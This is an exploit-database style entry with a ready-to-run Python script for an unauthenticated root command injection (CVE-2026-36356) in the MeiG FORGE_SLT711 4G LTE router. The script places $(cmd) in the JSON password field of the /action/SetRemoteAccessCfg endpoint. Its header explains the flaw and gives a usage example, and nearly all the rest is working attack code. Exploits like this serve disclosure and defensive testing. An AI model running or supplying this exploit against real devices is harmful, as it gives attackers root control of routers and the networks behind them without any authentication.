# Exploit Title: MeiG Smart FORGE_SLT711 - OS Command Injection
# Date: 2026-05-03
# Exploit Author: Daniil Gordeev
# Vendor Homepage: http://www.meigsmart.com
# Software Link: N/A (firmware distributed via carrier channels)
# Version: Firmware MDM9607.LE.1.0-00110-STD.PROD-1 (likely all firmware versions of this product line)
# Tested on: MeiG FORGE_SLT711 (Ortel 4G LTE CPE), Qualcomm MDM9607, Linux 3.18.48
# CVE: CVE-2026-36356
"""
Unauthenticated RCE — MeiG FORGE_SLT711 (Ortel 4G LTE CPE)
GoAhead /action/SetRemoteAccessCfg OS command injection

Vuln:  JSON "password" field → sprintf("echo root:\"%s\"|chpasswd") → system()
Auth:  None (endpoint missing from route.txt auth list)
Root:  Commands execute as uid=0(root)
Type:  Blind — output not in HTTP response, use --cmd "cmd > /tmp/out" to exfil

Discovered: 2026-02-21
Tested on:  FW MDM9607.LE.1.0-00110-STD.PROD-1
"""

import argparse
import json
import sys
import urllib.request
import urllib.error

def exploit(ip: str, cmd: str, port: int = 80, timeout: int = 10) -> bool:
    url = f"http://{ip}:{port}/action/SetRemoteAccessCfg"
    payload = json.dumps({"password": f"$({cmd})"})

    req = urllib.request.Request(
        url,
        data=payload.encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )

    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode()
            data = json.loads(body)
            if data.get("retcode") == 0:
                print(f"[+] retcode:0 — command executed as root")
                return True
            else:
                print(f"[-] Unexpected response: {body}")
                return False
    except urllib.error.URLError as e:
        print(f"[-] Connection failed: {e}")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

def main():
    p = argparse.ArgumentParser(
        description="MeiG SLT711 GoAhead unauthenticated RCE (blind)",
        epilog="Example: %(prog)s --ip 192.168.1.1 --cmd 'id > /tmp/out'",
    )
    p.add_argument("--ip", default="192.168.1.1", help="Target IP (default: 192.168.1.1)")
    p.add_argument("--port", type=int, default=80, help="Target port (default: 80)")
    p.add_argument("--cmd", required=True, help="Command to execute as root (blind, no output returned)")
    p.add_argument("--timeout", type=int, default=10, help="HTTP timeout in seconds (default: 10)")
    args = p.parse_args()

    print(f"[*] Target:  {args.ip}:{args.port}")
    print(f"[*] Command: {args.cmd}")
    print(f"[*] Payload: $({{cmd}}) inside password field")

    ok = exploit(args.ip, args.cmd, args.port, args.timeout)
    sys.exit(0 if ok else 1)

if __name__ == "__main__":
    main()